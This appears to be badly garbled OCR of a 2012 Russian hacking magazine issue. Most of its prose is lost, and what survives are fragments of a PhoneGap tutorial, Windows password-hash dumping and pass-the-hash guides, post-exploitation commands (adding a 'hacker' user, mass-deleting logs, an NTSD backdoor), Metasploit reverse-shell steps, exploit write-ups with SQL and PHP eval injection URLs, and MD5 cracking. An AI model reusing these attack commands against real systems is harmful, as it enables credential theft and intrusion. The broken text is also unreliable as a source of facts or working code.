cyptogaphy
l , ...
. , ,
, ,
~ . ,
. ... ,
, , -
, .
depositio
! ) -
. , .
, , .
. ,
: -
?>>.
r.1
. . . ?
, .
, :
Elcomsoft
, ,
, , ,
2001
...
l , .
~ ,
. ,
- ,
r.1
, ,
. . . 2002.
, . ,
r.1
, , ,
Elcomsoft
~ ,
CONFIOENCE 2.0
. . .
CANON.
Puic
lteest l. ,
1 %
. ,
l ,
. ,
~ I) .
- : n
. ,
>>.
. .
, n
, ,
, ,
Elcomsoft
17
3000, ,
3500.
, ,
. n
300,
IT,
,
. :::
01 /156/2012
Preview
30 .
.
11,
n n
n n
: n ~ n
~n ~ n
.
. n
n
.
n n
n n, n
Lotus Domino
Contolle n n
.
n, n,
n I
PCZONE
36
HTML5
A nd oid
n n,
? n.
- .
n n
, n
n .
n .
iOS,
MALWARE
500 n,
. n
n .
01/156/2012
DUQU
n
,
n n n
Stuxnet.
I!
,
MBR,
n,
5 nn
.
035
PCZONE
PhoneGap:o
HTML5
- ,
,
.
iOS,
todo list
Windows 8,
, , , n
HTML5.
n, .
, n n
n n
Adroid
, -
, - , n
CSS!,
PhoneGap. n
HTML, JavaSc i pt
n n nn n:
Windows Phone,
lk,
WebOS,
Symian
iOS, Andoid,
Bada.
n n n
. , n
Objective-C
Java
PhoneGap.
PhoneGap API.
HTML5
API
n n
, n n n
: , n, [
), n , ,
! ) , . .
,
._.....
-~ --
---
...........
- .
n jQuey Moile Secha,
,
[ n ) .
n , n
, n n n .
- .
iOS- -,
AppStoe, n
:). : ,
036
iOS
, , , Andoid. ,
n ,
01/156/20 12
PhoneGap: HTML5
, jQuey Moile.
JS-
n [ n
l n . ,
,
! JQue y Moile
[jqueymoile.com/download l n n
n, :
images/ [n n
jq-moilel;
index.css;
index.html;
index .js;
jquey.js;
jquey.moile.min.css;
jquey.moile . min.js.
,
. n
index.html.
, <<
>> << >>.
c/ div >
cdiv data-role= "content" >
cdiv id= "map-canvas" >
! -- -->
, .
iOS .
c/ div>
c/div>
c/div>
data-dom-cache="true" ,
n n << n ,
. <<>>
n, : <<
, . AppStoe
<< n >>. ,
, n >> ,
n . ,
n. ,
n n
.
, ,
PHONEGAP
. :
n -n , n
, PhoneGap n iOS.
PhoneGap
n , n n
<< >> . !
- Google Maps v.
: n .
. ,
, n
, .
[ << >>!. ,
- <<
>>
API.
. lgithub.com/
phonegap/phonegap-p luginsl,
iPhone, Android, Palm, Bla ckBerry. iOS
20 r: BarcodeScann er [ -!. AdPIugi [ iAdl, Nati veCont rol s l iOS
locaiStoage .
l .
<< >>, -
<< >>. n,
01 /156/2012
PhoneGap ,
037
PCZONE
EnableViewportScale
Externa!Hosts
n :
ltemO
ltem 1
ltem 2
ltem 3
MediaPiaybackRequiresUserAction
-->
Boolean
00 Array
String
String
String
..
NO
(41tems)
csi .gstatic.com
.googleapis.com
maps.goog le.com
String
Boolean
maps.gstatic.com
NO
ExternaiHosts
chl>Toc/hl>
//
self.addPoint(event. latlng,
self.options.radius, message);
self.updatePointslist(); // q
</>
});
</div>
}, false );
<!--n
-->
n - .
cdiv>
<!-- -->
n n n
. nn
if (navigator.geolocation) {
/1
n <<>> nn data-tansition=>>pop>>,
data-diection=>>evese>>,
<<>> <<>>.
nn . , .
Geolocation AP I
!, n n l:
function gpsSuccess(pos) {
var lat, lng;
if (pos.coords) {
lat
pos.coords.latitude;
lng
pos.coords.longitude;
el se
pos.latitude;
lat
lng
pos.longitude;
/1
/1
/1
window.setinterval( function () {
/1
n n
navigator.geolocation.getCurrentPosition(gpsSuccess,
$.noop, {
enaeHighAccuracy: true ,
maximumAge:
});
});
},
Maps.
Gm-
n,
);
. - :
movePeson n n n
getPointslnBoundsll
t his .person = new gm.Marker({
map: t his .map,
icon: new gm.Markerlmage(PERSON_SPRITE_URL,
new gm.Size( 48 , 48 ))
n, n
- . n-
n ?
HTML5
locaiStoage, n !n
,
l. , n,
});
, !
PERSON_SPRITE_URL n n
Ggl - . - maps.gstatic.
com/mapfiles/c/mod scou t/cb scout spite api OO . png .
, n
, , n,
n . n
click:
- n - Safai Chome.
,
n <<n>> .
/1
n h ~ -n n -
038
, n , , n
WebKit . ~
01 / 156/ 2012
PhoneGap:
HTML5
. , , n
Run-
iPhone/iPad
PhoneGap.
index.html ,- . ,
n n,
n
www.
<<t folde
efeences f
any added
foldes.
, .
www.
PhoneGap.
PhoneGap
phonegap-1.2 .0.js
. <<
>>. 5uppoting
plist,
Fil es/PhoneGap.
E xtenai H osts ,
( Google
Mapsl: *gstatic.c om, *googleapis.com, maps.google.com.
,
. -
DOMReady
jQuey :
/1
11
if (navigator.network.connection.type
Connection.NONE) {
iOS
$.noop,
. - (n Denwe
TILE);
}, false);
XAMPPI, ,
.
n , . ,
-. ,
. navigato. notification.alet
alet, ,
PhoneGap,
. ,
, netwo k .
i05-. ,
PhoneGap
IDE
i05,
05 10.6+ (
05 10.61, Xcode
i05 50 . 50 , n
Apple . Xcode i05 50 l deve l ope.
4 . , '
Apple (
alet confim ,
n
PhoneGap:
function (button_id) {
n , 5t,
!. ,
Objective-C.
PhoneGap,
PhoneGap i05.
lhttps://g ithub .com/callback/phonegap/zipba ll /1.2 .01,
i05 .
, Xcode PhoneGap.
i05
UI-
jQuery Moblle- ,
ile,
01/156/2012
PhoneGap
IDE
Zepto.js
039
PCZONE
i f (button_id === 1) { //
self.removePoint(point);
}
TILE );
},
, n,- , n
i.i n .
, n ln ,
l ,
56 .84484567007557 ...
Ph oneGap:
56.84583899763894 ...
hG-n
TILE
);
}' {
frequency:
iOS
iOS,
! , nn
iOS
D eve l ope
Pogaml. n
});
n n
IAndoid,
-
, . n
Run
Windows Phonel
App le,
n . ,
, n n n n
- . n
$99
, n
n .
iS - ' nn n
n n . n n
n nn
iPad
n,
n .
:1.
n Stoe.
$99 n n ,
n - .
iPhone, iPod
Xcode.
iOS
Apple
: n n
nn n n iS -
! , n
n n : it .l y/tD6xA !I . ,
n
. .
?
n -n
n n n
PhoneGap,
n ,
PhoneGap.
iOS n
Objective-C,
n n
n n n , n
. .
API PhoneGap.
n n, n An d o id
Appcelerator Titanium
Titanium
iPhone,
Andoid
Moile
n
n lk.
, n n
nium
IDE .
Tita-
n, n
$49 ].
$120 . l t
, n
Titanium
25
. n n n
Apache 2.
7,
n, n !
:
n n
n -
iOS An-
n , -
: $199 n $349
iOS
Andoid. n n
IDE
n , JavaScipt.
01.0
PhoneGap-
n n n
n. n
, n n,
HTML+JS
- n
n , n n
doid. . ,
Ph oneGap,
n,
OpenGL.
phonegap .
com/sta t l . n ,
. n
Windows
, - n
. ,
Ph one Gap
n Nitoi
phonegap l.
n n Ni toi n
Adobe .
, nn n n n n
? ::
01 / 156/2 01 2
. .
PCZONE
Ant
la.zhukov!Oreal.xakep.rul
WINDOWS-APOE
WINDOWS-CCTEM
, ,
?
, .
:
S-, LM/NTLM- xe
;
LSA, LM/NTLM-xe
, ;
, Sh-
,
! , ,
! .
, -.
:
, ,
PWDUMP
FGDUMP
NTLM.
.
.
. NTLM / LM-xe
.
, DLL-
SeDebugPivilege . ,
la NT AUTHORIY\SYSTEMI .
, :
l NT AUTHORITY\
SYSTEM l ,
Ea syHack .
.
pwdump localhost
fgdump . exe
127.0.0.1.PWDUMP
l ! 127.0.0.1 .CACHEDUMP
l ! .
01/156/2012
Widows-apoe
,
, .
, ,
pwdump,
, MYDOMAIN \
someuse- , la mepasswod-
, mytaget.log - .
pwdump, fgdump
1 >> -
hostfile.txt- ,
w n n n
pwdump
10
, <<-
! !.
,
fgdump.exe.
VOLUME SH AOOW
pwdump
n n n
Cedentials Edito (WCEI
Windows
vssown.vbs
SERVICE
fgdump
, ,
. ,
SAM,
, . ,
, -
. - ,
1.
, -
SYSTEM .
, ,
. , ,
\\?\GLOBALROOT \ Device\HarddiskVolume5hadowCopy14\
wi ndows\sys tem32 \ config \ SYSTEM .
\\?\GLOBALROOT \Device\HarddiskVolumeShadowCopy14\
windows\sys tem32 \co nfig \SAM .
, .
, >> ,
2.
, -
l ,
SAM SYSTEMI,
, ,
,
! ,
. ,
Wi nd ows
SAM
, ,
. , -
SYSTEM
NTDS.DIT,
SYSTEM.
n n ?
. _
, , n
, .
01/156/2012
NTDS.DIT
, .
Csaba t ,
NTDS.DI T .
PCZONE
ntds dump has h.zip. ,
n n BackTack5 !n
Linu-],
n . ,
.
libesedb:
cd libesedb
chmod + configure
./configure && make
..- .....
...~""..."'
e su~_
. ..s.o
1000
1011.1:
lOM
<~ ...d ~
I ~
'"'"'""'"
11111111111111
<Di ..Od ~
."'...
<Di t>lod ~
<fmptp
O tntuo.,.
-----
f .. 5ae7te7 11tttlA...
O u<c
........
Z01?1..0."'6 1 D:IAIS , .
SAMiside
:
.
, :
cd esedbtools
. / esedbdumphash .. / .. /ntds .dit
/l ibe sedb/esedbtools/ntds.dit.expot/datatable.
. ,
SYSTEM:
cd .. / .. /creddump/
python ./dsdump.py .. /SYSTEM
. /libesedb/esedbtools/ntds.dit.export/datatale
! !
! ] .
smyen : leee:s
, :
HomeGroupUser$:1882:HASH
python . / dsdumphistory .
! ] .
'
HASHGRAB2+
SAMDUMP2
METASPLOIT
, .
tt.
, .
Metasploit
, ,
. :
Famewok
LiveCO !,
Offline NT Passwod & Registy Edi t o],
- ,
.
Liv- . HashGab2
Metasploit-
PsExec:
Windows-pae, , n
SAM
samdump2
SYSTEM .
SAMinside
insidepro.comlrus/sami nside.shtml
lm2ntcrack
ighashgpu
www.xmco.fr/lm2ntcracklindex .html
NL-.
. N
. , -
, L- .
, L- ,
- .
NT -
ighshgu
n.
. ,
GU
, LM-apo-ADMINISTRATOR,
Windows
, , ,
lm2tca c k .
01 /156/2 01 2
Windows-napoe
~~-~
+ il
O t Jt
meterpreter
meterpreter
meterpreter
meterpreter
ll3.PJI~
:I08Dt69'1D71iill:\117 ,,,
31D6CI'!IXIIW931
AI031RSI~
DlofSOC1(0lll~
. . 31151~ ..
, ,
. ,
. ,
getsystem .
MS09-012,
MS10-015 [KiTrapDDI .
,
NTLM
NTML w
! w !
WINDOWS
CREDENTIALS EDITOR
PASS-THE-HASH
Cain&Abel-
WCE
Pass-the-Hash Toolkit'a,
. -
:1. -
[ NTLM/LM-xe !:
1997
wce.exe -1
, -,
- - :
. ,
, :
, / NL- . IAM.
- ,
[ , , . .l,
,
,
wce.exe -s
:579118C49145815C47ECD267657D3174
Iteret Explorer \ iexplore . exe"
user:Victim:1F27ACDE849935BBAADB435B51484EE
NL-,
, << .
, .
whosthere.exe-
, . :1
iam.exe -h
administrator:mydomain:AAD384358514@4EEAADB
4358514@4EE:31DCFEeD16AE931873C59D7EeCe89Ce
, , .
, [, l
, , ,
CUDA-Multiforcer
,
. :::
ophcrack
www.openwall .cam
n Windows
iw-.
NL-,
Vidia.
-. jum
, ,
inw-. ,
diff',
[ win321 .
01/156/2012
NTLM .
. , , Windows-ccee,
? . ,
? - ,
.
n n nwn
nn . n , ,
n n (
nmap, -
w),
ipconf ig /all
ipconfig /displaydns
D NS-e .
-~
/U-. - ,
netstat - nabo
netstat -s
............................................
, .
[tcpludplicpmlip]
: ..
j netstat -
: route print
: .
'''''''f'
.,... ....
......................
..... .......
. ..................... . ..................... .
, ,
445.
net view
SMB [!.
l. , ,
[ '/do m ai',
, . .
j net accounts
[ ! .
>> .
............ .
.. .. .
: net share
;,
....
S - .
R- .
. . . . ...... ... ....... ....... .... ... ... ........ ....... ......
: type %WINDIR%\System32\drivers\etc\
j hosts
NetBIOS, , , , . .
....... .... ... .... ............................ ......................... ... .................... .... ....................................................................... .
................ .........................
....
hosts.
. ....................................... ..
n enna - .
(n~~ :
n ( r ), ,
, , r nr . .
? .
whoami
? ! .
qwinsta
, , - . R- !
!, .
( uame !, , .
. ................
..................
- .
. ........................................... .
set
systeminfo (XP+I
; , , ,
: , , .
~ , .
qprocess
~ ,
..... ................................
.. . .................
SET
. ~~~ ~
.... ............
~
....................................
~..
10
PID
.. .... .... ....... ... ..... ... .. ... '...... . .............'............ ... . .........
. .........
%%
, , ,
at
~ , . at,
: schtasks (XP+I
.............. ,.: ..
net start
sc getkeyname ""
sc queryex ""
~~.~.~~.~.~~. ~~.~~~ ~~~~~.~~ .~~~~.~~~~~~.~~~~ .~~~.~~.~.~~~ .~.~~.~.~~~ ~ l~~.~~:.~.~.~.~. ~~~ ~ ~ 1................. ,.... .
sc query
PIO
key
..............................................................................................
j
tasklist (+)
.........................
......................... .
.... , .............
PIO
.......
! .~.~~.til~si n~~ .~r.i~eS. .................... .........~.~~.~.~~.~.~~.~:.ll\. ~ ~~~~ l~~.~.~~~~~.~~~ ~ ~:.~~~~..~:..~~ ~.~~~.~~~.~~~~~.: ............................................... .
: gpresult
/z
- .
nor. , noro. n ,
n .
, (, . . !.
wevtutil el
: wevtutil qe <LogName>
: ..
: del %WINDIR%\*.Iog / /s /q /f
.....
~~~~~~~ ~.~~~~~~' ~~~............ ............ ...... ................ ..... ................... ............... ............................................................... .
WINDOWS.
Windows - n n
no n n n. -
n - nn.
%windir%\System32\cmd .exe /
''%SystemRoot%\syst em32\Dism .
/online /get-features
, .
....................................................................
%windir%\System32\cmd.exe /
''%SystemRoot%\system32\Dism.
" /online /enaie-feature 1
featurename:TFTP
TFTP. F - tftp.exe
system32.
Windows
Vista
ntsd.exe,
[ ), - .
apec>, port=1337
[ ). <<.shell>>,
.
NTSD
B ack d oo.
i .
net use
- , n
n. n: w
, , n,
(n, n n).
~ security . , , system.
.....................................................................................
..
'"
""
.. ...
.. .......
..
................................................... ..
!. .
~~~-~-~-~--~~-~-~-~~-~ ~--~--~.:~~~~ ........... ..~~--~-~- -~-~-~~~ -~-~~~~-~-~-~-~ - SAM, ~ .~~~~-~:.~~~~--~~ -~--~-~~-~~-~~~-~-~~~: ............................. .......... .......... .
add
[\\
9. ][\
maln
!: ,
[ TagetiPadd l.
<<R EG ADD HKLM\Sof tware\MyCo /v Data /t REG_BINAR Y /d f e340ead >> [ : Oata,
~ : REG_BINARY, : fe340eadl .
.. ...................... "...........
........
................
~ n .
.
; n n .
, , .
w , , :
sam_backup.dat?
w, ,- , .
dir \ /s / 1 find
/1
"search_string"
: , .
d i 1\1 1/sl
ba se 1/bl se a c h_s t i n g, .
, ,
CWMIC
, WI- (WMICI:
, , .
WMI
: , - , I- ,
.
wmic printer get Caption, Default, Direct, Description, Local, Shared, Sharename, Status
n , .
'
Soft-
: Softwae Update.
, .
netuserhackerhacker/add
hacke .
h acke .
: hacke .
...........................................................
disae
- ( , ) ,
.
Windows.
, -
( , ).
( ) .
..........................................................................................:...................................... .
/S
MITM
RDP
Iir!!t.:t
.
-
. ,
51 [
RC4 ).
. , ,
,
. ?
, i-. ,
RDP,
. ,
D5- ,
[ . . ). .
: <<
Windows, 2000 [ ). .
~ .
n - ,
TLS .
g:l[ZyAQy).
[gQQ,
RDP MiTM,
, .
6-
. -
man-in-the-middle [MiTM),
,
, n . ,
11
n ,
21 ARP ARP .
31 n.
L.l : ,
. ,
<< >>
MiTM
RDP.
, , , ,
Siffe S addess.
-, .
51 ap-poisoing .
, : ) .
i
RDP
6- :
. i-
ARP-RDP
RD- .
, , .
11
. ?
. ,
21
salt ' o. .
31 ,
.
L.l
.
050
. , ,
- longeek ' a
[goo.gi/Embxsl.
RD-,
, .
[goo.gl/pydMZI. ,
,
2003
RPD 5.0.
01 / 156/201 2
EASY
JAVA
,
,
Java,
, . ,
,
Fl ash,
Ja va
J v- .
, ,
. ?
. ? ':]
Java
, . javateste.og/
JavaScipt,
vesio.html .
Jv-,
. , ,
. ? ,
-
CVE-201 0-4452,
Metasploit'e:
B ackTack
l www.social-e g i ee . og].
SET
, .
11 :
use exploit/widows/browser/java_codebase_trust
2) :
set URIPATH test.php
set LPORT 88
3) :
Set payload java/ meterpreter/ reverse_tcp
4) :
Exploit
tt
,
Ja va
:].
. : -
SET
Java .
, ? ?
- .
? ?:] ,
, ,
- . ,
. ,
:11,
[ ).
. ,
, ,
- ,
. :
SMTP [25/I
. ,
Gmail
Mail.u.
www.example.com:25l. ,
nmap
, , , , ,
, -
, -. ,
. ?
150
. ,
IP.
UOP
ICMP,
l www . proxy . ru l, ,
.
. , security. nov. u
,
, ,
Proxy server
Use proxy server for your LAN (These settigs will t apply to
dial-up or VPN conections),
. :1
[ * ], [
Address:
pro)(y
-25
01/156/ 2012
~['iiiiiiiiiiiiiiiiil]l
Port:
~ 1Advaced ...
051
1EASY
REVERSE-POKC
~ , vs
. ? ,
-, [
) -
. ? . ,
vs-
-,
WAF
SS L- cepepa,
, [,
) .
.
,
[ ,
HP-traceroute.
Squid
reverse proxy
reverse-npoc Wikipedia.org
- ?).
.
vs-
, ,
- . ?
. ,
. ,
GET
POST,
TTL I- .
- .
. ,
- ,
X-F owaded-Fo,
- taceoute. , R -
, ! , -
-,
MaxFowads. ta ceo ut e,
lgoo.gi/VObeW). ,
RFC 2616
1.1,
Fowads . ,
TR ACE
OPTIONS.
RFC,
GET
I- .
:
-m
CSRF
(TRACE/
.r\!
L LJ
. GET- an p oc- . ,
S?
) . ,
- . ,
,
[, ) ,
[ ,
) . ,
, ,
. ,
, n Ja vaSc ipt . ,
- -
anpoca? - XM L- a np oc.
XML-
:)
. .
G- : http://
seve.com/change_passwod.php? NP=ew_pass, ew_pass , . ,
L' :
052
01 /156/2012
EASY
!, ,
er..i.r.~t
---
digital
foensicsl- ,
.
,
,-
.
, :
;
n ;
;
DLL- ;
;
;
;
Vitual Addess Descipto;
;
. .
,
, , ,
Volatility 19QQ]L
Hi5ip l. Python'e
Windows ! XPI, , 32- .
n .
imageinfo- ;
f d:\te st.aw- .
Volatility - . ;l
IWinX PSP3x86l,
, n
. , ?
, ,
!
!, , n
. ,
--profile=WinXPSPx86
, , :
- :
.
--profile=WinXPSPx86
. , n ,
! ,
USBI.
, - ?
Volatilit y.
, Python'o,
- , ,
,
SAM, -
LSA?
Windows .
stndln- , .
, :
hivelist-
,
:
--profile=WinXPSPx86
hashdump-
103560- System;
s 180560- SAM.
, . ,
. ,
, .
Volatility.
01 /156/2012
053
[ivinside.iogspot.coml
[115612, . , .11
Excel.xlb
CVSSV2
111111 111 11 11 11111 1111
9.3
111 11
5 2011 .
Aniway, abysssec, sinn, juan vazquez.
CVE: CVE-2011-01 05.
n ,
. ,
, ,
Excel.
f:J!Iii
Excel
, ,
051,
! , ).
xl b.
01 / 156/ 201 2
start () ;
==
if(($ key = array search (basename ($ POST [ ' id ' ]) , $selected0ocuments )) !== false )
{
}
baseame ( $ POST [ ' icJ ' ]) . "\n ";
displayArray ($selectedDocuments ) ;
l ()) ;
BIFFB.
Bl FF-
BOF
= workbook globals
Workbook globals
BOF
7.
,
EOF
BOF
worksheet
Sheet records
sub _3 0199E55.
EOF
BOF
= worksheet
Sheet records
, ,
,
EOF
.text:esF8e
.text:e5F835
ID
.text:e5F838
( )
sz
( )
.text:e5F844
.text:e5F849
(ID ] - .
.t ext:e5F84 F
. text:e5F856
.text:e5F858
.text:e 5 F85E
BOF, :
.text:e5F862
.text:e5F867
BOF , BIFF8
.
2
4
12
~;
. text:e5F869
2
2
2
2
2
2
4
4
89
ID
.text : e5F86A
01
. text:e5F86C
f'
.text:e5F86E
***.fc H
. text:e5F86F
ID
.text:e5F872
call su_11
mov , [ebp+var_EDC]
imul , [ebp+var_Fee]
mov edi,
mov , [ebp+var_EEe]
lea , [ + + ]
call su_ l
push eFFFFFFFDh
edx
sub edx,
add , edx
push ; Dst
push ; int
mov , edi
call sub_e199E55
F-:
.text:e5F87e
.text:e5F83E jz l_54488
(sz
call su_11
cmp , h
mov [ebp+var_ED4] ,
Excel,
sub_30199E55
,
. ,
.
- Workbook globals
01 /156/2012
055
static
checkFile ($name ) {
if ($GLOBALS [ config uration
file k list l ] !=
$ acklist = explode (" , ", $GLOBALS [ configLJration
} else {
puic
11
][
$ acklist
}
$ acklist
[]
{
1
1
][
file
list
1
]);
= ();
= pt1p
1
1
;
CheckFilell
.text:30199E0
.text:30199E4
-. n
, n
.
, .
memcp y,
nepen
, / GS . ,
esp .
,
ca ll esp .
mov , [esp+l0h+Dst]
push esi ; Size
lea edx, dword_30FEB8[ebx]
push edx ; Src
push ; Dst
sub edi, esi
call memcpy
add [esp+lCh+Dst], esi
add , esi
.tex t :0 199EAD add esp, 0Ch
.text:30199EB0 test edi, edi
.text : 30199EB2 mov dword_30F72C0,
.text:30199EB8 jnz loc_301E0DB
. text:30199E93
.text:30199E97
. text:30199E98
.text :30199E9E
.text:30199E9F
. text:30199EA0
.text :30199EA2
. text:30199EA7
.text:30199EAB
i(.1;ldfifi
Microsoft Office Excei2007/ Microsoft Office Excel2007 SP 2.
,_i,J!IiitJ:I
, .
CVSSV 2
11111
[AVL/AC:L/Au:N/C:C/1 /)
1]]
,
.
: 22011 .
:
KiDebug.
CVE: CVE-2011-1985.
/ GS / SAFESEH . , /GS-
wi n32k.sys ,
MS Visual Studio,
, .
>> n.
,
.
IJ34!Jii
cookie,
.
64-
, ,
coo kie. , ,
. -
. /S AFESEH
S- .
,
, n
. ,
. Visual Studio
/ SAFESEH
056
01 /156/2012
- BSoD:
RETURIJ t o
EXCEL . O II OEE
frooo
f:L .7
14
CB_SELECSTRING
exe14D
CB_FINDSTRINGEXACT
LB_ADDSTRING
LB_INSERTSTRING
LB_SELECTSTRING
LB_FINDSTRING
LB_FINDSTRINGEXACT
LB_INSERTSTRINGUPPER
LB_INSERTSTRINGLOWER
LB_ADDSTRINGUPPER
LB_ADDSTRINGLOWER
1s
14
14
11
1
exelBF
12
exelAA
l
1
exelAD
.,.,,Jdjfi
.text:BF914ece
.text:BF914ece
.text:BF9148C2
.text:BF9 14eC
. text : BF9148CS
; WND
.text:BF9148C8
CB_ADDSTRING
CB_INSERTSTRING
CB_FINDSTRING
==
mov
edi, edi
push
mov
, esp
mov , [ebp+WND)
exffffffff (-1),
mov , [ecx+2eh )
f"jJ!IijiJ:I
MSll-077, .
int
.text:BF88EEBB
[ebp+arg_le)
int
.text:BF88 EEBC
push
. text: BF88 EE BF
and
, Fh
. text : BF88EEC2
push
[ ebp+Address]
Address
.text :BF 88EECS
push
[ebp+UnicodeString] ; int
. text: BF 88E EC 8
push
[ ebp+arg_4]
; int
. t ext: BF 88EECB
push
esi
; int
. text : BF 88E ECC
ca l l
ds:_gapfnMessageCall[eax*4 )
; NtUserfniNSTRINGNULL(x,x,x,x,x,x,x)
Wordpress
CVSSV2
11111111 1111 11 11111111 1
~5
1111 111 1
l1
WodP e ss
.
, ,
.
- -,-
,
.
IJ:J4!Jii
/fws/addons/
t i m e/j sc i t s/t i _ m 1 1u g i s/ j f i 1 ma g 1 j _ s ave _
name.php, 37-56
.
t i m /j s i t s/t i _ m / 1u g i s/ j f i 1 ma g 1 j _ t _
folde.php:
SendMessageCallback((HWND)- l ,CB_ADDSTRING, e, e, e, e );
SendNotifyMessage((HWND)- l ,CB_ADDSTRING, e, e );
01 / 156/201 2
'w+' );
057
i f ($_POST[ 'templateName' ]) {
$dir = ' .. / . / .. / .. /content/editor_templates/' .
$_SESSION[ 's_login' ];
i f (!is_dir($dir) && !mkdir($dir, 8755 )) {
throw new Exception(_COULDNOTCREATEDIRECTORY);
$filename = $dir. '/' .$_POST[ 'templateName' ]. '.html' ;
$templateContent = $_POST[ 'templateContent' ];
i f (file_exists($filename) === false) {
$ok = file_put_contents($filename,
$templateContent);
chmod($filename, 8644 );
GetUserTimeTargetll
, file_put_
, ,
!
data.php,
php,
magic_quotes_gpc. ,
, :
-.
ex pl oit- db .co m
!EDB-10: 18111].
.
,
, :
11 Arch Li nux
# pacman -5 php
/ / Debian- ba sed
# apt-get install php
. FileSystemTee::uploadFile!l,
, hkFil[]
. , ,
<host>- ,
<path>- WodPess.
file_ack_list,
Joomla!, -
CONFIG_SYS_ROOT_PATH.
if1;1d:Jfi
3. SQL- UPDATE.
getUseTimeTaget[], /libaies/
tools.php : .
fil!iijiB'
'
2.2 .4 .
package_l ,
$entity. , /www/
peiod ic_ u pdate.php:
eFront
~5
CVSSV2
111111 1111 111 11 111111
1111
[AV: N/AC:L/Au: N/C:P/1: /:]
IIJj]
EgiX
eFont.
,
, .
f:JQ!Iii
1. .
/www / d i to /t i ny_ m / 1ug i s/save _ te m 1 te/s ave _ te m 1 te. h
! 8-18]:
058
i f ($_5ESSION[ 's_login' ]) {
$entity = getUserTimeTarget($_GET[ 'HP_REFERER' ]);
//$entity = $_5ESSION['s_time_!arget ' ] ;
//Update times for this entit y
$result = eF_executeNew( "update user_times set time=time+("
. time().
"-timestamp_now),timestamp_now="
. time().
"lr.tlere session_expired = and session_custan_identifier =
$_5ESSIDN[ 's_custom_identifier' ].
"' and users_LOGIN = '" .
$_SESSION[ 's_login' ].
"' and entity = '" .
current($entity).
"'and entity_id
key($entity).
"'" );
01 /156/2012
, $_G['_REFERER'],
getUseTimeTagetl l ,
eF_executeNew ll . ,
SQL- URL
:
http:/ / localhost/efront/www/periodic_updater.php?
HTTP_REFERER=http://host/?package_ID=[SQL]
$_SERVER('HP_REFER ER '], , -,
.
.
4.
/www/index.php:
if (isset($_COOKIE[ 'cookie_login' ])
&& isset($_COOKIE[ 'cookie_password ' ]))
try {
$user = EfrontUserFactory :: factory(
$_COOKIE[ 'cookie_login ' ]);
$user - > login($_COOKIE[ 'cookie_password ' ], true);
$_COOK IE ['cookie_login'J.
EfontU serFactory::factoyll,
,
:
-.
/www/s tudent.php:
WEXLER.BOOK ESOOl
2033 ~
WEXLER
EfrontCourse,
evalll :
/s tudent.php?lessons_ID=1&course[id]=1&course
[directions_ID]=1&course[rules]=a: 1 :{s: 19 : "1];
phpinfo();die; /* " ;a: 1 :{s: : "lesson" ;i : e ;}}
if.1;1dJt1
119441.
,_1,J!Iii[I:J
. ::::
01 /156/2012
WI!XLI!.
www.wexler.ru
pilifijij
: 8 (800) 200 96 60
[iog.chivavas.org[
I
4850
2 n
2,2
!
Radeon
bjt.Jy/yEhdi
RainbowCac k n
n ! .
bjt.[y/viSB9K -
n
~>
MD5
MD5.
,
. -,
,
,
.
, ,
MD5.
:
,
. ,
.
. -
l
l
, . .
MD5
MD5.
1 28-
. , 1 28-
, .
1991
MD4 .
1992 RFC 1321. MD5
, CMS
-
- SS L-.
,
1993
MD5
, . ,
1996-, ,
MD5.
SHA1 [
, ,
SHA21 RIPEMD-160.
MD5 1 2004 .
MD5CRK -
CetainKey Cy ptosystems
.
- .
24 2004
, - ,
01 /156/20 12
~ '(
,,
'"''- "
f 1H
LJJ
11:'
;,.
.,
' 'jiJI:fl(,(;
;t
, JII
,J,J
(.,J
.,,
."
t:' l
'!
'' '1'
14
,,
1;
Cl~
., w
'11
-~
'-,t,
Loto
11
1)/
'/
!:!1
~ 1
t-~-
.JH
~i
..ili
Ul
".,
l;f,
t,
,-,.,"
l:f,
1:-'
j,
11
1-'
1/
l; fj
:'
~.-
Jl
.~.
.,
,, ,j
''11~ ::-
..
,.,.,,,,,,,
w
., ~
,.,j
: :t
::,
~~
1_1 1
,/
;,
tH
'"
t- ~.
,,
: :-;
'1;
HIIL,
<i !" :l
. 1
~. -
l't
/ 1
: I'J
/1
41
,,,
. ,
'"
1' /
. -
f lf,
/IJ
1'<
;t .
l,'i
'1,
41.1
"4
t,::
~-
,,.,
1::
.'
-;;
~ -
11!
t.tl
IJ1f
'1
I 'J
31
,,,
''
11
;;,,
/1>
1!1.1
Keccak
Skein.
2008
NIST
SHA1 SHA2.
BLAKE, Gostl, JH,
' j~:
,,j
1''1
.,,;
-;,.
:1 '1
::
Ui
:''
"'-; ,
/1
11
11
~~
t.'J
ol1
f lf,
1'1
c 1J
'
~
,_,,
,,.;
lof,
111.
~'11
(Jrj
,,.
. ,
''
f';
/1>
- : d8578edf8458ceefbc5b76a
t,.,
1<1
J
4~
' !1:
':
tl:
),J
-~
,,.,
/'.-'
, -
f lt,
<4
4
l oJ
f o<l
::/
,,,,
.,,
1J'1
t ..t
oJI!
ibl
t.'1
\!
::;
4;
~; 1
f:,J
00
ili
-;-;
'
: t
1 -~'
1.'
IJ'I
(Jf,
<11
~ r .1 ~
''
. ,,
"' "
MD5
,, ..
/'HJ~,.1,.J;,;L, 1 ,t t. t.,;,,,,.
;;
1)1}
-~
GHASHGPU:
GPU
5854.
1:;,,,,f '1 t .1
lghashgpu,
www.golubev.com
DS-
.
xe a , lghashgpu
GPU,
ATI Steam . n
, CPU,
.
GPU ,
. , :
Windows:
-max:7
MDS
MD5.
- [qwetyl.
,
, - ,
. dllfd4559815b2c3delb685b
86283, , ,
<<_admi .
IBM 690 [ ,
, :
].:-] 2005
.
ighashgpu.exe
. 509
-u:[abcdefghijklmopqrstuwvxyz1234567890_]
-h:dllfd4559815b2c3delb685b8a6283
-t : mdS
-m:??????_admi
, .
,
.
.
2006
2006
'-u'
, !
2008
'-m'
<<_admin >>.
MD5.
2007 ,
Sony Pla yStat io MD5.
: 1,4 D5-
! , 2009-, BlackHat
USA GPU ,
, -
n ,
n .
. ,
. ,
<< ,
. ,
- , .
<< - ,
MD5 . ,
MD5
, ,
. ,
, .
01 /15612012
061
- -
..
l! ~t b
Pl l illtt llt
Pl t 1ntt rt1DI!tr
11t4.S:p.fi
fit65343561E e 36
HHfi!74756!
49 !.:61
70 3(39"'~""
0 o~ t70c:6datd72c:561at7dsttc:t o 6c!sl
ftl 7 !I)t2fd1422 12C.H99!d05ttt8b9 H
oe ~ htp2
d0 4:ny2V
306534!147032
- ,
126
ASCII, 63 527 879 748 485 376 . 254
17 324 859
956 700 833 536, 2,7 ,
. , ,
. ,
d11t:thttld&orted
, .
pl&1nt t ztfound:
tOt<illle:
tio!chaint:a"-er,e:
ti:r.to!a lanzcect:
2.e9t
